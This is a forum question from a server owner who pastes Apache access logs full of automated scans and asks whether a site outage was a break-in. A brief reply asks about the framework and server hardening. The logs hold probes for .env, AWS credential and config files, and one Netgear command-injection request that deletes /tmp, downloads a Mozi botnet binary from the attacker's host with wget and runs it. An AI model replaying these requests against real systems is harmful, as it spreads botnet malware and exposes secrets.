OVH server (strange entries in httpd/access.log)

0

Since yesterday I have been seeing the following entries on my OVH server, which runs CentOS Linux 8.2.2004:

138.99.216.228 - - [05/Jul/2022:04:07:06 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
192.241.208.93 - - [05/Jul/2022:04:14:30 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [05/Jul/2022:04:18:29 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.213.59 - - [05/Jul/2022:04:38:28 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.222.172 - - [05/Jul/2022:05:13:30 +0200] "MGLNDD_51.195.90.75_443\n" 400 226 "-" "-"
164.92.147.180 - - [05/Jul/2022:05:20:33 +0200] "GET / HTTP/1.1" 404 196 "-" "Java/1.8.0_332"
185.7.214.104 - - [05/Jul/2022:05:26:15 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
199.30.231.5 - - [05/Jul/2022:05:35:26 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.47 - - [05/Jul/2022:05:38:49 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.196.220.70 - - [05/Jul/2022:05:40:56 +0200] "GET / HTTP/1.1" 404 196 "-" "Linux Gnu (cow)"
2.47.180.141 - - [05/Jul/2022:05:46:34 +0200] "GET / HTTP/1.0" 404 196 "-" "-"
222.186.19.205 - - [05/Jul/2022:05:53:57 +0200] "CONNECT whois.pconline.com.cn:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:05:53:57 +0200] "CONNECT zz.bdstatic.com:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:05:53:57 +0200] "GET http://whois.pconline.com.cn/jsFunction.jsp HTTP/1.1" 404 196 "-" "Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100"
52.255.168.47 - - [05/Jul/2022:06:02:51 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
5.235.205.176 - - [05/Jul/2022:06:26:48 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.235.205.176 - - [05/Jul/2022:06:26:48 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
221.2.163.231 - - [05/Jul/2022:06:36:31 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0"
185.7.214.104 - - [05/Jul/2022:06:38:08 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.162.235.110 - - [05/Jul/2022:06:50:47 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
216.218.206.68 - - [05/Jul/2022:06:51:54 +0200] "GET / HTTP/1.1" 404 196 "-" "-"
138.99.216.228 - - [05/Jul/2022:06:56:56 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
178.73.215.171 - - [05/Jul/2022:07:00:34 +0200] "GET / HTTP/1.0" 404 196 "-" "-"
88.214.43.118 - - [05/Jul/2022:07:03:47 +0200] "GET /environments/.aws/.credentials HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
88.214.43.118 - - [05/Jul/2022:07:03:47 +0200] "\x16\x03\x01\x01]\x01" 400 226 "-" "-"
202.164.136.28 - - [05/Jul/2022:07:06:09 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 196 "-" "-"
94.102.61.10 - - [05/Jul/2022:07:06:51 +0200] "GET / HTTP/1.1" 404 196 "-" "python-requests/2.26.0"
185.189.182.234 - - [05/Jul/2022:07:12:33 +0200] "GET / HTTP/1.1" 400 226 "-" "-"
188.253.49.24 - - [05/Jul/2022:07:24:00 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
188.253.49.24 - - [05/Jul/2022:07:24:00 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
188.253.49.24 - - [05/Jul/2022:07:24:00 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
192.241.223.4 - - [05/Jul/2022:07:40:15 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [05/Jul/2022:07:57:21 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.7.214.104 - - [05/Jul/2022:08:14:50 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.171 - - [05/Jul/2022:08:45:53 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.214.46 - - [05/Jul/2022:09:01:38 +0200] "\x16\x03\x01" 400 226 "-" "-"
221.2.163.231 - - [05/Jul/2022:09:07:23 +0200] "\x16\x03\x01" 400 226 "-" "-"
103.220.30.102 - - [05/Jul/2022:09:08:51 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.46.255.228 - - [05/Jul/2022:09:13:17 +0200] "\x16\x03\x01\x01.\x01" 400 226 "-" "-"
20.28.203.31 - - [05/Jul/2022:09:13:57 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [05/Jul/2022:09:13:58 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [05/Jul/2022:09:13:58 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
109.237.103.38 - - [05/Jul/2022:09:31:07 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.38 - - [05/Jul/2022:09:31:07 +0200] "\x16\x03\x01\x01C\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:12 +0200] "\x16\x03\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:13 +0200] "\x16\x03\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:14 +0200] "\x16\x03\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:14 +0200] "REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0" 400 226 "-" "-"
192.241.219.87 - - [05/Jul/2022:09:37:20 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.24 - - [05/Jul/2022:09:39:38 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.223.11 - - [05/Jul/2022:09:42:19 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.7.214.104 - - [05/Jul/2022:09:45:41 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [05/Jul/2022:09:46:29 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
193.201.9.157 - - [05/Jul/2022:09:46:43 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
193.201.9.157 - - [05/Jul/2022:09:46:46 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
193.201.9.157 - - [05/Jul/2022:09:46:50 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
5.184.104.92 - - [05/Jul/2022:09:52:27 +0200] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
5.184.104.92 - - [05/Jul/2022:09:52:27 +0200] "GET /index.php HTTP/1.1" 302 402 "-" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
5.184.104.92 - - [05/Jul/2022:09:52:27 +0200] "GET /index.php/users HTTP/1.1" 200 523501 "-" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
5.184.104.92 - - [05/Jul/2022:09:52:29 +0200] "GET /bootstrap-5.1.3-dist/js/bootstrap.js HTTP/1.1" 304 - "http://dziennik.website/index.php/users" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
159.65.151.57 - - [05/Jul/2022:23:40:44 +0200] "\x16\x03\x01" 400 226 "-" "-"
159.65.151.57 - - [05/Jul/2022:23:40:45 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [05/Jul/2022:23:53:37 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
222.186.19.205 - - [05/Jul/2022:23:56:44 +0200] "CONNECT whois.pconline.com.cn:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:23:56:45 +0200] "CONNECT pv.sohu.com:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:23:56:45 +0200] "GET http://whois.pconline.com.cn/jsFunction.jsp HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1025 Safari/532.5"
185.7.214.104 - - [06/Jul/2022:00:09:09 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.93.152.58 - - [06/Jul/2022:00:31:54 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.143.200.118 - - [06/Jul/2022:00:35:50 +0200] "\x03" 400 226 "-" "-"
20.28.203.31 - - [06/Jul/2022:00:42:52 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [06/Jul/2022:00:42:52 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [06/Jul/2022:00:42:53 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
62.102.148.68 - - [06/Jul/2022:00:51:45 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.220.101.32 - - [06/Jul/2022:00:51:49 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
2.196.132.178 - - [06/Jul/2022:00:52:50 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://2.196.132.178:35282/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 196 "-" "-"
172.104.138.223 - - [06/Jul/2022:01:57:24 +0200] "GET /fuN3 HTTP/1.0" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
104.129.48.126 - - [06/Jul/2022:02:08:52 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
185.7.214.104 - - [06/Jul/2022:02:11:17 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [06/Jul/2022:02:42:14 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
104.129.48.126 - - [06/Jul/2022:02:48:32 +0200] "GET /000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:48:34 +0200] "GET /WebItemsLevel.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:48:35 +0200] "GET /polycom/000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:50:41 +0200] "GET /aastra.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:51:03 +0200] "GET /y000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:56:15 +0200] "GET /spa122.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:21 +0200] "GET /configs/spa122.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:39 +0200] "GET /yealink/WebItemsLevel.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:39 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:39 +0200] "GET /spa112.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:59:53 +0200] "GET /configs/y000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:59:57 +0200] "GET /configs/000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
120.41.45.199 - - [06/Jul/2022:03:18:27 +0200] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; ThinkChaos/0.3.0; +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow._Thank_you.)"
120.41.45.199 - - [06/Jul/2022:03:18:28 +0200] "GET /index.php HTTP/1.1" 302 402 "http:///******.website" "Mozilla/5.0 (compatible; ThinkChaos/0.3.0; +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow._Thank_you.)"
120.41.45.199 - - [06/Jul/2022:03:18:29 +0200] "GET /index.php/login HTTP/1.1" 200 4372 "http://******.website/index.php" "Mozilla/5.0 (compatible; ThinkChaos/0.3.0; +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow._Thank_you.)"
20.239.52.159 - - [06/Jul/2022:03:19:52 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:53 +0200] "POST / HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:53 +0200] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:54 +0200] "POST / HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:54 +0200] "GET /.env.save HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:55 +0200] "POST / HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
45.95.169.113 - - [06/Jul/2022:03:34:34 +0200] "\x16\x03\x01" 400 226 "-" "-"
98.143.61.244 - - [06/Jul/2022:04:17:32 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.7.214.104 - - [06/Jul/2022:04:20:29 +0200] "\x16\x03\x01" 400 226 "-" "-"
45.83.64.195 - - [06/Jul/2022:04:21:31 +0200] "\x16\x03\x01" 400 226 "-" "-"
34.234.90.160 - - [06/Jul/2022:04:26:04 +0200] "\x16\x03\x01" 400 226 "-" "-"
34.234.90.160 - - [06/Jul/2022:04:26:04 +0200] "GET / HTTP/1.1" 404 196 "-" "Go-http-client/1.1"
66.70.212.115 - - [06/Jul/2022:04:29:38 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.70.212.115 - - [06/Jul/2022:04:29:38 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.70.212.115 - - [06/Jul/2022:04:29:39 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
180.149.125.171 - - [06/Jul/2022:04:34:57 +0200] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
192.241.214.190 - - [06/Jul/2022:04:41:52 +0200] "\x16\x03\x01" 400 226 "-" "-"
170.210.45.163 - - [06/Jul/2022:04:41:52 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
170.210.45.163 - - [06/Jul/2022:04:41:53 +0200] "GET / HTTP/1.1" 404 196 "-" "curl/7.58.0"
192.241.222.234 - - [06/Jul/2022:04:44:03 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:03 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:03 +0200] "\x16\x03\x03\x01V\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:04 +0200] "\x16\x03\x03\x01H\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:04 +0200] "\x16\x03\x03\x01\x99\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:04 +0200] "\x16\x03\x02\x01\x9a\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:06 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:06 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:07 +0200] "\x16\x03\x01\x01\x9d\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:08 +0200] "\x16\x03\x01\x01\xb4\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:40 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:42 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:42 +0200] "\x16\x03\x03\x01V\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:48 +0200] "\x16\x03\x03\x01H\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:56 +0200] "\x16\x03\x03\x01\x99\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:04 +0200] "\x16\x03\x02\x01\x9a\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:12 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:12 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:20 +0200] "\x16\x03\x01\x01\x9d\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:28 +0200] "\x16\x03\x01\x01\xb4\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:36 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.73 - - [06/Jul/2022:06:06:13 +0200] "\x16\x03\x01" 400 226 "-" "-"
74.201.28.114 - - [06/Jul/2022:06:06:44 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 196 "http://51.195.90.75:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.36.205.236 - - [06/Jul/2022:06:08:09 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
192.241.221.113 - - [06/Jul/2022:06:10:25 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.7.214.104 - - [06/Jul/2022:06:15:56 +0200] "\x16\x03\x01" 400 226 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /.env HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /phpinfo HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /phpinfo.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.json HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /settings.json HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /info.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /configuration.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /conf.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /settings.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
154.6.130.144 - - [06/Jul/2022:06:37:08 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
104.206.128.74 - - [06/Jul/2022:06:46:29 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
95.255.65.13 - - [06/Jul/2022:07:19:12 +0200] "\x16\x03\x01\x01\x89\x01" 400 226 "-" "-"
192.241.214.46 - - [06/Jul/2022:07:40:46 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [06/Jul/2022:07:49:59 +0200] "\x16\x03\x01" 400 226 "-" "-"
20.222.102.211 - - [06/Jul/2022:08:00:54 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.222.102.211 - - [06/Jul/2022:08:00:54 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
192.241.212.172 - - [06/Jul/2022:08:02:55 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [06/Jul/2022:08:23:56 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
137.226.113.44 - - [06/Jul/2022:08:44:23 +0200] "\x16\x03\x01" 400 226 "-" "-"
80.94.93.43 - - [06/Jul/2022:09:33:29 +0200] "GET / HTTP/1.1" 302 213 "-" "libwww-perl/6.67"

And today, when I got up and opened the site domena.website, a blank page appeared instead of the site, and the same happened when I entered the bare IP address; this affected the subdomains as well. So I logged into Webmin and restarted the Apache server, and everything works fine, but in my opinion it could have been a break-in and now I don't know what to think about it?

1
  1. What kind of site was it? On which framework? Some of the entries look like a primitive attack aimed at extracting configuration files. Old or unpatched frameworks are vulnerable to such attacks.
  2. Did you secure the server yourself?
